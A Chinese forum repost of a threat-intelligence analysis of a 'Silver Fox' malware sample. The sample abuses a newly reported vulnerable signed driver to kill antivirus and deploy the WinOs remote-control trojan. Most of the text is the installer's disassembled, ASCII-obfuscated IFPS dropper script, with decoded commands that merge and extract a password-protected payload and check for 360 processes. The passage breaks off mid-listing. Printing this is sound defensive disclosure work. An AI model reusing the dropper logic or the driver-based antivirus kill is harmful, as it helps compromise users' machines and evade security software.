社区应用 最新帖子 精华区 社区服务 会员列表 统计排行
发帖 回复
« 返回列表
  • 11阅读
  • 1回复

[分享]持续演进的银狐——不断增加脆弱驱动通过BYOVD结束防病毒软件

 楼层直达
z3960 
级别: FLY版主
发帖
861718
飞翔币
127803
威望
325932
飞扬币
3918562
信誉值
8
只看楼主 更多操作 0 发表于: 2小时前

持续演进的银狐——不断增加脆弱驱动通过BYOVD结束防病毒软件

一、背景


在日常样本狩猎中,我们发现捕获的一枚银狐样本尝试加载了先前未曾出现过的可疑驱动STProcessMonitor Driver,最终加载WinOs远控程序操控用户计算机。
该驱动通过了WHQL认证,具有"Safetica Technologies s.r.o."与"Microsoft Windows Hardware Compatibility Publisher"颁发的数字签名,签名时间为‎2025‎年‎5‎月‎9‎日 11:43:46,相当新鲜。[font=-apple-system, BlinkMacSystemFont, &quot]

经过分析,该STProcessMonitor Driver在没有经过目标验证的情况下,将结束进程功能的IOCTL暴露给用户模式。该漏洞使攻击者能够终止内核模式中的任意进程,通过BYOVD KillAV。

进一步溯源,我们发现,该批银狐行为者多次组合使用多种脆弱驱动干扰防病毒软件,肆意操纵用户计算机,并最终加载WinOs远控载荷,将用户计算机变为可以被黑客控制的“肉鸡”,先前已多次被国内安全厂商发现并分析,可参考:2025年7月 金山毒霸安全团队/鹰眼威胁情报中心团队 《"银狐"新进展:多Rootkit配合,内核InfinityHook+穿透读写》2025年11月 微步在线团队 《连用四个驱动!银狐开始硬刚EDR和杀软 | 银狐十月总结》但是本次使用的STProcessMonitor Driver在先前并未使用过,在上述文章中也并未出现,是当前样本新添加的脆弱驱动利用。同时,鉴于该驱动在互联网、开源仓库、漏洞数据库中均未找到相关记录,且来自VirusTotal Relations的信息表明相关驱动至今仍有被分发的迹象,即相关驱动目前可能仍在被使用、分发,我们将其提交至CVE漏洞数据库并分配编号CVE-2025-70795(撰写本文时为RESERVED状态,待本文发布,并向magicsword-io/LOLDrivers仓库提交后,会在合适的时机Apply for publication)。这也表明该批银狐行为者可能会在真实世界中主动搜寻和挖掘全新的漏洞驱动。
样本执行流程图请参考如下:[font=-apple-system, BlinkMacSystemFont, &quot]

本文思维导图请参考如下(按照复杂梯度排序):[font=-apple-system, BlinkMacSystemFont, &quot][font=-apple-system, BlinkMacSystemFont, &quot]


二、样本分析



A.) Setup


SHA-256: 3ba89047b9fb9ae2281e06a7f10a407698174b201f28fc1cadb930207254e485该程序为使用Inno Setup打包的安装程序,如下图所示:

第一步,提取安装程序内的应用文件和安装程序内嵌文件(1) 安装程序内的应用文件包含: main.1 main.2 unzip.2 unzip.3其中,main.1具有7-Zip压缩包文件头,但单文件并不完整;unzip.3具有MZ头和PE头,但单文件并不完整。[font=-apple-system, BlinkMacSystemFont, &quot]将main.1+main.2合并后可以确认为7-Zip加密压缩包;将unzip.3+unzip.2合并后可以确认为7-Zip Standalone Console (Signed by NVIDIA Corporation)。[font=-apple-system, BlinkMacSystemFont, &quot][font=-apple-system, BlinkMacSystemFont, &quot]

(2) 我们观察到安装程序内嵌文件CompiledCode.bin,这是一个编译后的IFPS脚本,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]第二步,反汇编编译的IFPS脚本——CompiledCode.bin=>CompiledCode.txt,如下图所示:[font=-apple-system, BlinkMacSystemFont, &quot]


1) "OBFUSCATEDEXTRACT"函数


我们在该类汇编伪代码中,观察到一个可疑函数"OBFUSCATEDEXTRACT",函数原文如下: 复制代码 隐藏代码.function(export) void OBFUSCATEDEXTRACT()        pushtype S32 ; StackCount = 1        pushtype UnicodeString_2 ; StackCount = 2        pushtype UnicodeString_2 ; StackCount = 3        pushtype UnicodeString_2 ; StackCount = 4        pushtype UnicodeString_2 ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype UnicodeString_2 ; StackCount = 7        pushtype UnicodeString_2 ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        pushtype UnicodeString_2 ; StackCount = 10        pushtype UnicodeString_2 ; StackCount = 11        pushtype UnicodeString_2 ; StackCount = 12        pushtype UnicodeString_2 ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(7)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(99)        assign Var15[1], S32(109)        assign Var15[2], S32(100)        assign Var15[3], S32(46)        assign Var15[4], S32(101)        assign Var15[5], S32(120)        assign Var15[6], S32(101)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var2 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(137)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(47)        assign Var15[1], S32(99)        assign Var15[2], S32(32)        assign Var15[3], S32(99)        assign Var15[4], S32(111)        assign Var15[5], S32(112)        assign Var15[6], S32(121)        assign Var15[7], S32(32)        assign Var15[8], S32(47)        assign Var15[9], S32(98)        assign Var15[10], S32(32)        assign Var15[11], S32(47)        assign Var15[12], S32(121)        assign Var15[13], S32(32)        assign Var15[14], S32(34)        assign Var15[15], S32(67)        assign Var15[16], S32(58)        assign Var15[17], S32(92)        assign Var15[18], S32(85)        assign Var15[19], S32(115)        assign Var15[20], S32(101)        assign Var15[21], S32(114)        assign Var15[22], S32(115)        assign Var15[23], S32(92)        assign Var15[24], S32(80)        assign Var15[25], S32(117)        assign Var15[26], S32(98)        assign Var15[27], S32(108)        assign Var15[28], S32(105)        assign Var15[29], S32(99)        assign Var15[30], S32(92)        assign Var15[31], S32(68)        assign Var15[32], S32(111)        assign Var15[33], S32(99)        assign Var15[34], S32(117)        assign Var15[35], S32(109)        assign Var15[36], S32(101)        assign Var15[37], S32(110)        assign Var15[38], S32(116)        assign Var15[39], S32(115)        assign Var15[40], S32(92)        assign Var15[41], S32(109)        assign Var15[42], S32(97)        assign Var15[43], S32(105)        assign Var15[44], S32(110)        assign Var15[45], S32(46)        assign Var15[46], S32(49)        assign Var15[47], S32(34)        assign Var15[48], S32(32)        assign Var15[49], S32(43)        assign Var15[50], S32(32)        assign Var15[51], S32(34)        assign Var15[52], S32(67)        assign Var15[53], S32(58)        assign Var15[54], S32(92)        assign Var15[55], S32(85)        assign Var15[56], S32(115)        assign Var15[57], S32(101)        assign Var15[58], S32(114)        assign Var15[59], S32(115)        assign Var15[60], S32(92)        assign Var15[61], S32(80)        assign Var15[62], S32(117)        assign Var15[63], S32(98)        assign Var15[64], S32(108)        assign Var15[65], S32(105)        assign Var15[66], S32(99)        assign Var15[67], S32(92)        assign Var15[68], S32(68)        assign Var15[69], S32(111)        assign Var15[70], S32(99)        assign Var15[71], S32(117)        assign Var15[72], S32(109)        assign Var15[73], S32(101)        assign Var15[74], S32(110)        assign Var15[75], S32(116)        assign Var15[76], S32(115)        assign Var15[77], S32(92)        assign Var15[78], S32(109)        assign Var15[79], S32(97)        assign Var15[80], S32(105)        assign Var15[81], S32(110)        assign Var15[82], S32(46)        assign Var15[83], S32(50)        assign Var15[84], S32(34)        assign Var15[85], S32(32)        assign Var15[86], S32(34)        assign Var15[87], S32(67)        assign Var15[88], S32(58)        assign Var15[89], S32(92)        assign Var15[90], S32(85)        assign Var15[91], S32(115)        assign Var15[92], S32(101)        assign Var15[93], S32(114)        assign Var15[94], S32(115)        assign Var15[95], S32(92)        assign Var15[96], S32(80)        assign Var15[97], S32(117)        assign Var15[98], S32(98)        assign Var15[99], S32(108)        assign Var15[100], S32(105)        assign Var15[101], S32(99)        assign Var15[102], S32(92)        assign Var15[103], S32(68)        assign Var15[104], S32(111)        assign Var15[105], S32(99)        assign Var15[106], S32(117)        assign Var15[107], S32(109)        assign Var15[108], S32(101)        assign Var15[109], S32(110)        assign Var15[110], S32(116)        assign Var15[111], S32(115)        assign Var15[112], S32(92)        assign Var15[113], S32(109)        assign Var15[114], S32(97)        assign Var15[115], S32(105)        assign Var15[116], S32(110)        assign Var15[117], S32(90)        assign Var15[118], S32(84)        assign Var15[119], S32(116)        assign Var15[120], S32(82)        assign Var15[121], S32(106)        assign Var15[122], S32(84)        assign Var15[123], S32(102)        assign Var15[124], S32(121)        assign Var15[125], S32(104)        assign Var15[126], S32(78)        assign Var15[127], S32(73)        assign Var15[128], S32(68)        assign Var15[129], S32(67)        assign Var15[130], S32(65)        assign Var15[131], S32(70)        assign Var15[132], S32(46)        assign Var15[133], S32(120)        assign Var15[134], S32(109)        assign Var15[135], S32(108)        assign Var15[136], S32(34)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var3 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype BOOLEAN ; StackCount = 14        pushtype Pointer ; StackCount = 15        setptr Var15, Var1        pushtype U8_4 ; StackCount = 16        assign Var16, U8_4(1)        pushtype S32 ; StackCount = 17        assign Var17, S32(0)        pushtype UnicodeString_2 ; StackCount = 18        assign Var18, String_3("")        pushtype UnicodeString_2 ; StackCount = 19        assign Var19, Var3        pushtype UnicodeString_2 ; StackCount = 20        assign Var20, Var2        pushvar Var14 ; StackCount = 21        call EXEC        pop ; StackCount = 20        pop ; StackCount = 19        pop ; StackCount = 18        pop ; StackCount = 17        pop ; StackCount = 16        pop ; StackCount = 15        pop ; StackCount = 14        sfz Var14        pop ; StackCount = 13        jf loc_196d        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(25)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(67)        assign Var15[1], S32(58)        assign Var15[2], S32(92)        assign Var15[3], S32(85)        assign Var15[4], S32(115)        assign Var15[5], S32(101)        assign Var15[6], S32(114)        assign Var15[7], S32(115)        assign Var15[8], S32(92)        assign Var15[9], S32(80)        assign Var15[10], S32(117)        assign Var15[11], S32(98)        assign Var15[12], S32(108)        assign Var15[13], S32(105)        assign Var15[14], S32(99)        assign Var15[15], S32(92)        assign Var15[16], S32(68)        assign Var15[17], S32(111)        assign Var15[18], S32(99)        assign Var15[19], S32(117)        assign Var15[20], S32(109)        assign Var15[21], S32(101)        assign Var15[22], S32(110)        assign Var15[23], S32(116)        assign Var15[24], S32(115)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var4 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(7)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(92)        assign Var15[1], S32(109)        assign Var15[2], S32(97)        assign Var15[3], S32(105)        assign Var15[4], S32(110)        assign Var15[5], S32(46)        assign Var15[6], S32(49)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var7 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(7)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(92)        assign Var15[1], S32(109)        assign Var15[2], S32(97)        assign Var15[3], S32(105)        assign Var15[4], S32(110)        assign Var15[5], S32(46)        assign Var15[6], S32(50)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var8 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype BOOLEAN ; StackCount = 14        pushtype UnicodeString_2 ; StackCount = 15        pushtype WideString ; StackCount = 16        assign Var16, Var4        add Var16, Var7        assign Var15, Var16        pop ; StackCount = 15        pushvar Var14 ; StackCount = 16        call DELETEFILE        pop ; StackCount = 15        pop ; StackCount = 14        pop ; StackCount = 13        pushtype BOOLEAN ; StackCount = 14        pushtype UnicodeString_2 ; StackCount = 15        pushtype WideString ; StackCount = 16        assign Var16, Var4        add Var16, Var8        assign Var15, Var16        pop ; StackCount = 15        pushvar Var14 ; StackCount = 16        call DELETEFILE        pop ; StackCount = 15        pop ; StackCount = 14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(11)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(92)        assign Var15[1], S32(102)        assign Var15[2], S32(117)        assign Var15[3], S32(110)        assign Var15[4], S32(122)        assign Var15[5], S32(105)        assign Var15[6], S32(112)        assign Var15[7], S32(46)        assign Var15[8], S32(101)        assign Var15[9], S32(120)        assign Var15[10], S32(101)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var5 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(24)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(92)        assign Var15[1], S32(109)        assign Var15[2], S32(97)        assign Var15[3], S32(105)        assign Var15[4], S32(110)        assign Var15[5], S32(90)        assign Var15[6], S32(84)        assign Var15[7], S32(116)        assign Var15[8], S32(82)        assign Var15[9], S32(106)        assign Var15[10], S32(84)        assign Var15[11], S32(102)        assign Var15[12], S32(121)        assign Var15[13], S32(104)        assign Var15[14], S32(78)        assign Var15[15], S32(73)        assign Var15[16], S32(68)        assign Var15[17], S32(67)        assign Var15[18], S32(65)        assign Var15[19], S32(70)        assign Var15[20], S32(46)        assign Var15[21], S32(120)        assign Var15[22], S32(109)        assign Var15[23], S32(108)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var6 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype WideString ; StackCount = 14        assign Var14, Var4        add Var14, Var5        assign Var11, Var14        pop ; StackCount = 13        pushtype WideString ; StackCount = 14        assign Var14, Var4        add Var14, Var6        assign Var12, Var14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(10)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(104)        assign Var15[1], S32(116)        assign Var15[2], S32(76)        assign Var15[3], S32(99)        assign Var15[4], S32(69)        assign Var15[5], S32(78)        assign Var15[6], S32(121)        assign Var15[7], S32(82)        assign Var15[8], S32(70)        assign Var15[9], S32(89)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var9 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(10)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(119)        assign Var15[1], S32(88)        assign Var15[2], S32(115)        assign Var15[3], S32(72)        assign Var15[4], S32(70)        assign Var15[5], S32(110)        assign Var15[6], S32(85)        assign Var15[7], S32(110)        assign Var15[8], S32(113)        assign Var15[9], S32(75)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var10 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype WideString ; StackCount = 14        pushtype UnicodeString_2 ; StackCount = 15        pushtype Type30 ; StackCount = 16        pushtype Type30 ; StackCount = 17        pushtype S32 ; StackCount = 18        assign Var18, S32(7)        pushvar Var17 ; StackCount = 19        call SETARRAYLENGTH        pop ; StackCount = 18        pop ; StackCount = 17        assign Var17[0], S32(120)        assign Var17[1], S32(32)        assign Var17[2], S32(45)        assign Var17[3], S32(121)        assign Var17[4], S32(32)        assign Var17[5], S32(45)        assign Var17[6], S32(112)        assign Var16, Var17        pop ; StackCount = 16        pushvar Var15 ; StackCount = 17        call STRFROMCODE        pop ; StackCount = 16        pop ; StackCount = 15        assign Var14, Var15        pop ; StackCount = 14        add Var14, Var9        add Var14, Var10        pushtype UnicodeString_2 ; StackCount = 15        pushtype Type30 ; StackCount = 16        pushtype Type30 ; StackCount = 17        pushtype S32 ; StackCount = 18        assign Var18, S32(4)        pushvar Var17 ; StackCount = 19        call SETARRAYLENGTH        pop ; StackCount = 18        pop ; StackCount = 17        assign Var17[0], S32(32)        assign Var17[1], S32(45)        assign Var17[2], S32(111)        assign Var17[3], S32(34)        assign Var16, Var17        pop ; StackCount = 16        pushvar Var15 ; StackCount = 17        call STRFROMCODE        pop ; StackCount = 16        pop ; StackCount = 15        add Var14, Var15        pop ; StackCount = 14        add Var14, Var4        pushtype UnicodeString_2 ; StackCount = 15        pushtype Type30 ; StackCount = 16        pushtype Type30 ; StackCount = 17        pushtype S32 ; StackCount = 18        assign Var18, S32(3)        pushvar Var17 ; StackCount = 19        call SETARRAYLENGTH        pop ; StackCount = 18        pop ; StackCount = 17        assign Var17[0], S32(34)        assign Var17[1], S32(32)        assign Var17[2], S32(34)        assign Var16, Var17        pop ; StackCount = 16        pushvar Var15 ; StackCount = 17        call STRFROMCODE        pop ; StackCount = 16        pop ; StackCount = 15        add Var14, Var15        pop ; StackCount = 14        add Var14, Var12        pushtype UnicodeString_2 ; StackCount = 15        pushtype Type30 ; StackCount = 16        pushtype Type30 ; StackCount = 17        pushtype S32 ; StackCount = 18        assign Var18, S32(1)        pushvar Var17 ; StackCount = 19        call SETARRAYLENGTH        pop ; StackCount = 18        pop ; StackCount = 17        assign Var17[0], S32(34)        assign Var16, Var17        pop ; StackCount = 16        pushvar Var15 ; StackCount = 17        call STRFROMCODE        pop ; StackCount = 16        pop ; StackCount = 15        add Var14, Var15        pop ; StackCount = 14        assign Var13, Var14        pop ; StackCount = 13        pushtype BOOLEAN ; StackCount = 14        pushtype UnicodeString_2 ; StackCount = 15        assign Var15, Var11        pushvar Var14 ; StackCount = 16        call FILEEXISTS        pop ; StackCount = 15        pop ; StackCount = 14        jz loc_18bc, Var14        pushtype BOOLEAN ; StackCount = 15        pushtype UnicodeString_2 ; StackCount = 16        assign Var16, Var12        pushvar Var15 ; StackCount = 17        call FILEEXISTS        pop ; StackCount = 16        pop ; StackCount = 15        and Var14, Var15        pop ; StackCount = 14loc_18bc:        sfz Var14        pop ; StackCount = 13        jf loc_196d        pushtype BOOLEAN ; StackCount = 14        pushtype Pointer ; StackCount = 15        setptr Var15, Var1        pushtype U8_4 ; StackCount = 16        assign Var16, U8_4(1)        pushtype S32 ; StackCount = 17        assign Var17, S32(0)        pushtype UnicodeString_2 ; StackCount = 18        assign Var18, String_3("")        pushtype UnicodeString_2 ; StackCount = 19        assign Var19, Var13        pushtype UnicodeString_2 ; StackCount = 20        assign Var20, Var11        pushvar Var14 ; StackCount = 21        call EXEC        pop ; StackCount = 20        pop ; StackCount = 19        pop ; StackCount = 18        pop ; StackCount = 17        pop ; StackCount = 16        pop ; StackCount = 15        pop ; StackCount = 14        pop ; StackCount = 13        pushtype BOOLEAN ; StackCount = 14        pushtype UnicodeString_2 ; StackCount = 15        assign Var15, Var12        pushvar Var14 ; StackCount = 16        call DELETEFILE        pop ; StackCount = 15        pop ; StackCount = 14        pop ; StackCount = 13loc_196d:        ret
其中,我们观察到大量ASCII码,例如在开头的[99, 109, 100, 46, 101, 120, 101]即对应cmd.exe: 复制代码 隐藏代码        assign Var15[0], S32(99)  ; 'c'        assign Var15[1], S32(109)  ; 'm'        assign Var15[2], S32(100)  ; 'd'        assign Var15[3], S32(46)  ; '.'        assign Var15[4], S32(101)  ; 'e'        assign Var15[5], S32(120)  ; 'x'        assign Var15[6], S32(101)  ; 'e'
在该函数中包含多个ASCII码数组,用于构建字符串并执行命令。字符串通过数组编码(如[67, 58, 92, ...]对应ASCII码,解码后为C:...),增加反分析难度。
以下是所有数组的ASCII码还原结果及其对应的字符串:

  1. 第一个数组(7字节)ASCII码:99, 109, 100, 46, 101, 120, 101字符串:"cmd.exe"

  2. 第二个数组(137字节)ASCII码:47, 99, 32, 99, 111, 112, 121, 32, 47, 98, 32, 47, 121, 32, 34, 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 109, 97, 105, 110, 46, 49, 34, 32, 43, 32, 34, 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 109, 97, 105, 110, 46, 50, 34, 32, 34, 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 109, 97, 105, 110, 90, 84, 116, 82, 106, 84, 102, 121, 104, 78, 73, 68, 67, 65, 70, 46, 120, 109, 108, 34字符串:"/c copy /b /y "C:UsersPublicDocumentsmain.1" + "C:UsersPublicDocumentsmain.2" "C:UsersPublicDocumentsmainZTtRjTfyhNIDCAF.xml""

  3. 第三个数组(25字节)ASCII码:67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115字符串:"C:UsersPublicDocuments"

  4. 第四个数组(7字节)ASCII码:92, 109, 97, 105, 110, 46, 49字符串:"main.1"

  5. 第五个数组(7字节)ASCII码:92, 109, 97, 105, 110, 46, 50字符串:"main.2"

  6. 第六个数组(11字节)ASCII码:92, 102, 117, 110, 122, 105, 112, 46, 101, 120, 101字符串:"funzip.exe"

  7. 第七个数组(24字节)ASCII码:92, 109, 97, 105, 110, 90, 84, 116, 82, 106, 84, 102, 121, 104, 78, 73, 68, 67, 65, 70, 46, 120, 109, 108字符串:"mainZTtRjTfyhNIDCAF.xml"

  8. 第八个数组(10字节)ASCII码:104, 116, 76, 99, 69, 78, 121, 82, 70, 89字符串:"htLcENyRFY"

  9. 第九个数组(10字节)ASCII码:119, 88, 115, 72, 70, 110, 85, 110, 113, 75字符串:"wXsHFnUnqK"

  10. 第十个数组(7字节)ASCII码:120, 32, 45, 121, 32, 45, 112字符串:"x -y -p"

  11. 第十一个数组(4字节)ASCII码:32, 45, 111, 34字符串:" -o""

  12. 第十二个数组(3字节)ASCII码:34, 32, 34字符串:"" ""

  13. 第十三个数组(1字节)ASCII码:34字符串:"""

该函数依次执行以下功能:
  1. 执行cmd.exe /c copy /b /y,将C:UsersPublicDocumentsmain.1和main.2合并为mainZTtRjTfyhNIDCAF.xml
  2. 删除main.1和main.2文件
  3. 检查funzip.exe和mainZTtRjTfyhNIDCAF.xml文件是否存在,如果存在则执行: funzip.exe x -y -p htLcENyRFYwXsHFnUnqK -o"C:UsersPublicDocuments" "C:UsersPublicDocumentsmainZTtRjTfyhNIDCAF.xml",解压mainZTtRjTfyhNIDCAF.xml文件
  4. 删除mainZTtRjTfyhNIDCAF.xml文件

于是我们得到mainZTtRjTfyhNIDCAF.xml文件解压密码为"htLcENyRFYwXsHFnUnqK",解压后可得到: men.exe man100.dat Server.log.即释放men.exe man100.dat Server.log.[font=-apple-system, BlinkMacSystemFont, &quot]其中,man100.dat是一个Zip压缩包,解压后可得到: temp_adjust.dat temp_filler.dat


2) "YQMBPLIVKAXLBBKHOYPB"函数


我们在该类汇编伪代码中,观察到一个可疑函数"YQMBPLIVKAXLBBKHOYPB",函数原文如下: 复制代码 隐藏代码.function(export) void YQMBPLIVKAXLBBKHOYPB()    pushtype BOOLEAN ; StackCount = 1    pushtype UnicodeString_2 ; StackCount = 2    pushtype UnicodeString_2 ; StackCount = 3    pushtype UnicodeString_2 ; StackCount = 4    pushtype UnicodeString_2 ; StackCount = 5    pushtype UnicodeString_2 ; StackCount = 6    pushtype S32 ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushvar Var8 ; StackCount = 9    call INITIALIZESETUP    pop ; StackCount = 8    pop ; StackCount = 7    pushvar Var1 ; StackCount = 8    call IS360PROCESSRUNNING    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    assign Var8, Var1    setz Var8    sfz Var8    pop ; StackCount = 7    jf loc_263f    pushtype BOOLEAN ; StackCount = 8    pushtype Pointer ; StackCount = 9    setptr Var9, Var7    pushtype U8_4 ; StackCount = 10    assign Var10, U8_4(1)    pushtype S32 ; StackCount = 11    assign Var11, S32(0)    pushtype UnicodeString_2 ; StackCount = 12    assign Var12, String_3("")    pushtype UnicodeString_2 ; StackCount = 13    pushtype WideString ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(12)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(47)    assign Var17[1], S32(99)    assign Var17[2], S32(32)    assign Var17[3], S32(99)    assign Var17[4], S32(111)    assign Var17[5], S32(112)    assign Var17[6], S32(121)    assign Var17[7], S32(32)    assign Var17[8], S32(47)    assign Var17[9], S32(98)    assign Var17[10], S32(32)    assign Var17[11], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    assign Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(13)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(51)    assign Var17[8], S32(34)    assign Var17[9], S32(32)    assign Var17[10], S32(43)    assign Var17[11], S32(32)    assign Var17[12], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(11)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(50)    assign Var17[8], S32(34)    assign Var17[9], S32(32)    assign Var17[10], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; 